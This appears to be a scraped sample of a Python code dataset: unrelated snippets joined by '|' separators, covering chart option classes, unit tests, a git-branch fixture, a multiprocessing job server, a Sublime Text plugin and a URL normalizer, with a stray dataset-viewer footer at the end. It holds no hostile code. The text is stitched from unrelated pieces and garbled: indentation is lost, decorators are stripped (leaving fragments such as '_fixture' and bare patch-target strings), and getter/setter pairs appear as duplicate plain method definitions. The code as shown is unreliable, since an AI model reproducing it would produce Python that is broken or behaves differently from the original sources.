with dlis.load(path) as (f, *_):
obj = f.object('VERY_MUCH_TESTY_SET', 'OBJECT', 1, 1)
attr = obj['DEFAULT_ATTRIBUTE']
assert (attr == [0j, 0j])
assert_log('value is not explicitly set') |
class OptionSeriesTimelineSonificationDefaultspeechoptionsActivewhen(Options):
def crossingDown(self):
return self._config_get(None)
def crossingDown(self, num: float):
self._config(num, js_type=False)
def crossingUp(self):
return self._config_get(None)
def crossingUp(self, num: float):
self._config(num, js_type=False)
def max(self):
return self._config_get(None)
def max(self, num: float):
self._config(num, js_type=False)
def min(self):
return self._config_get(None)
def min(self, num: float):
self._config(num, js_type=False)
def prop(self):
return self._config_get(None)
def prop(self, text: str):
self._config(text, js_type=False) |
_fixture
def branches(origin):
branches = ['f20', 'epel7', 'el6', 'fedora/26', 'rhel-7']
middle_branches = ['el6', 'fedora/26']
border_branches = ['f20', 'epel7', 'rhel-7']
assert (0 == os.system(' set -e\n cd work\n for branch in {branches}\n do\n git branch $branch\n git checkout $branch\n git push origin $branch\n done\n '.format(branches=' '.join(branches))))
(yield (origin, branches, middle_branches, border_branches)) |
class TestConstants(unittest.TestCase):
def test_defaults(self):
assert constants.use_fast_pyparsing_reprs
assert (not constants.embed_on_internal_exc)
def test_fixpath(self):
assert (os.path.basename(fixpath('CamelCase.py')) == 'CamelCase.py')
def test_immutable(self):
for (name, value) in vars(constants).items():
if (not name.startswith('__')):
assert (not isinstance(value, list)), (('Constant ' + name) + ' should be tuple, not list')
assert (not isinstance(value, set)), (('Constant ' + name) + ' should be frozenset, not set')
assert_hashable_or_dict(name, value)
def test_imports(self):
for (new_imp, (old_imp, ver_cutoff)) in constants.py3_to_py2_stdlib.items():
if ('/' in old_imp):
(new_imp, old_imp) = (new_imp.split('.', 1)[0], old_imp.split('./', 1)[0])
if (((new_imp == 'dbm.gnu') and (WINDOWS or PYPY)) or (PY26 and (old_imp == 'ttk')) or (PYPY and new_imp.startswith('tkinter')) or (PYPY and (old_imp in ('trollius', 'aenum'))) or old_imp.startswith(('typing_extensions', 'async_generator')) or (PY39 and (new_imp == '_dummy_thread'))):
pass
elif (sys.version_info >= ver_cutoff):
assert is_importable(new_imp), ('Failed to import ' + new_imp)
else:
assert is_importable(old_imp), ('Failed to import ' + old_imp)
def test_reqs(self):
assert (not (set(constants.unpinned_min_versions) & set(constants.pinned_min_versions))), 'found pinned and unpinned requirements'
assert (set(constants.max_versions) <= (set(constants.pinned_min_versions) | set(('cPyparsing',)))), 'found unlisted constrained but unpinned requirements'
for maxed_ver in constants.max_versions:
assert (isinstance(maxed_ver, tuple) or (maxed_ver in ('pyparsing', 'cPyparsing'))), 'maxed versions must be tagged to a specific Python version'
def test_run_args(self):
assert ('--run' not in constants.coconut_base_run_args)
assert ('--quiet' not in constants.coconut_base_run_args)
assert (not any((arg.startswith('--target') for arg in constants.coconut_base_run_args)))
def test_targets(self):
assert all((((v in constants.specific_targets) or (v in constants.pseudo_targets)) for v in ROOT_HEADER_VERSIONS))
def test_tuples(self):
assert isinstance(constants.indchars, tuple)
assert isinstance(constants.comment_chars, tuple) |
def make() -> PresetType:
return {'options': {'maxNesting': 20, 'html': True, 'linkify': False, 'typographer': False, 'quotes': '', 'xhtmlOut': True, 'breaks': False, 'langPrefix': 'language-', 'highlight': None}, 'components': {'core': {'rules': ['normalize', 'block', 'inline', 'text_join']}, 'block': {'rules': ['blockquote', 'code', 'fence', 'heading', 'hr', 'html_block', 'lheading', 'list', 'reference', 'paragraph']}, 'inline': {'rules': ['autolink', 'backticks', 'emphasis', 'entity', 'escape', 'html_inline', 'image', 'link', 'newline', 'text'], 'rules2': ['balance_pairs', 'emphasis', 'fragments_join']}}} |
def make_server_manager(port, authkey):
job_q = queue.Queue()
result_q = queue.Queue()
class JobQueueManager(SyncManager):
pass
JobQueueManager.register('get_job_q', callable=(lambda : job_q))
JobQueueManager.register('get_result_q', callable=(lambda : result_q))
manager = JobQueueManager(address=('', port), authkey=authkey)
manager.start()
print(('Server started at port %s' % port))
return manager |
def test_paginate_query(in_memory_storage):
for i in range(10):
resource_id = MockResourceIdentifier(str(i))
item = MockStorageItem(resource_id, f'test_data{i}')
in_memory_storage.save(item)
page_size = 3
query_spec = QuerySpec(conditions={})
page_result = in_memory_storage.paginate_query(2, page_size, MockStorageItem, query_spec)
assert (len(page_result.items) == page_size)
assert (page_result.total_count == 10)
assert (page_result.total_pages == 4)
assert (page_result.page == 2) |
class TaskWindowLayout(MainWindowLayout):
consumed = List()
state = Instance('pyface.tasks.task_window.TaskState')
def _get_dock_widget(self, pane):
for dock_pane in self.state.dock_panes:
if (dock_pane.id == pane.id):
self.consumed.append(dock_pane.control)
return dock_pane.control
return None
def _get_pane(self, dock_widget):
for dock_pane in self.state.dock_panes:
if (dock_pane.control == dock_widget):
return PaneItem(id=dock_pane.id)
return None |
class ColorHelperChangesCommand(sublime_plugin.WindowCommand):
def run(self):
try:
import mdpopups
has_phantom_support = ((mdpopups.version() >= (1, 10, 0)) and (int(sublime.version()) >= 3124))
except Exception:
has_phantom_support = False
text = sublime.load_resource('Packages/ColorHelper/CHANGES.md')
view = self.window.new_file()
view.set_name('ColorHelper - Changelog')
view.settings().set('gutter', False)
view.settings().set('word_wrap', False)
if has_phantom_support:
mdpopups.add_phantom(view, 'changelog', sublime.Region(0), text, sublime.LAYOUT_INLINE, wrapper_class='color-helper', css=CSS, on_navigate=self.on_navigate)
else:
view.run_command('insert', {'characters': text})
view.set_read_only(True)
view.set_scratch(True)
def on_navigate(self, href):
webbrowser.open_new_tab(href) |
def _normalize_url(url):
parsed = parse.urlparse(url)
if parsed.query:
parsed_query = parse.parse_qsl(parsed.query)
query = parse.urlencode(sorted(parsed_query))
parsed = parsed._replace(query=query)
if (('=' in parsed.fragment) and ('&' in parsed.fragment)):
parsed_fragment = parse.parse_qsl(parsed.fragment)
fragment = parse.urlencode(sorted(parsed_fragment))
parsed = parsed._replace(fragment=fragment)
return parse.urlunparse(parsed) |
class OptionSeriesPieSonificationTracksMappingTime(Options):
def mapFunction(self):
return self._config_get(None)
def mapFunction(self, value: Any):
self._config(value, js_type=False)
def mapTo(self):
return self._config_get(None)
def mapTo(self, text: str):
self._config(text, js_type=False)
def max(self):
return self._config_get(None)
def max(self, num: float):
self._config(num, js_type=False)
def min(self):
return self._config_get(None)
def min(self, num: float):
self._config(num, js_type=False)
def within(self):
return self._config_get(None)
def within(self, value: Any):
self._config(value, js_type=False) |
def multiary_multiplication_fixer(bmg: BMGraphBuilder) -> NodeFixer:
maf = MultiaryOperatorFixer(bmg, bn.MultiplicationNode)
def multiary_multiplication_fixer(node: bn.BMGNode) -> NodeFixerResult:
if (not maf._needs_fixing(node)):
return Inapplicable
acc = maf.accumulate_input_nodes(node)
return bmg.add_multi_multiplication(*acc)
return multiary_multiplication_fixer |
class OptionSeriesWaterfallZones(Options):
def className(self):
return self._config_get(None)
def className(self, text: str):
self._config(text, js_type=False)
def color(self):
return self._config_get(None)
def color(self, text: str):
self._config(text, js_type=False)
def dashStyle(self):
return self._config_get(None)
def dashStyle(self, text: str):
self._config(text, js_type=False)
def fillColor(self):
return self._config_get(None)
def fillColor(self, text: str):
self._config(text, js_type=False) |
('foremast.datapipeline.datapipeline.boto3.Session.client')
('foremast.datapipeline.datapipeline.get_details')
('foremast.datapipeline.datapipeline.get_properties')
def test_get_pipeline_id(mock_get_properties, mock_get_details, mock_boto3):
test_pipelines = [{'pipelineIdList': [{'name': 'Test Pipeline', 'id': '1234'}, {'name': 'Other', 'id': '5678'}], 'hasMoreResults': False}]
generated = {'project': 'test'}
properties = copy.deepcopy(TEST_PROPERTIES)
mock_get_details.return_value.data = generated
mock_get_properties.return_value = properties
mock_boto3.return_value.get_paginator.return_value.paginate.return_value = test_pipelines
dp = AWSDataPipeline(app='test_app', env='test_env', region='us-east-1', prop_path='other')
dp.get_pipeline_id()
assert (dp.pipeline_id == '1234') |
class OptionPlotoptionsSankeySonificationContexttracksMappingFrequency(Options):
def mapFunction(self):
return self._config_get(None)
def mapFunction(self, value: Any):
self._config(value, js_type=False)
def mapTo(self):
return self._config_get(None)
def mapTo(self, text: str):
self._config(text, js_type=False)
def max(self):
return self._config_get(None)
def max(self, num: float):
self._config(num, js_type=False)
def min(self):
return self._config_get(None)
def min(self, num: float):
self._config(num, js_type=False)
def within(self):
return self._config_get(None)
def within(self, value: Any):
self._config(value, js_type=False) |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.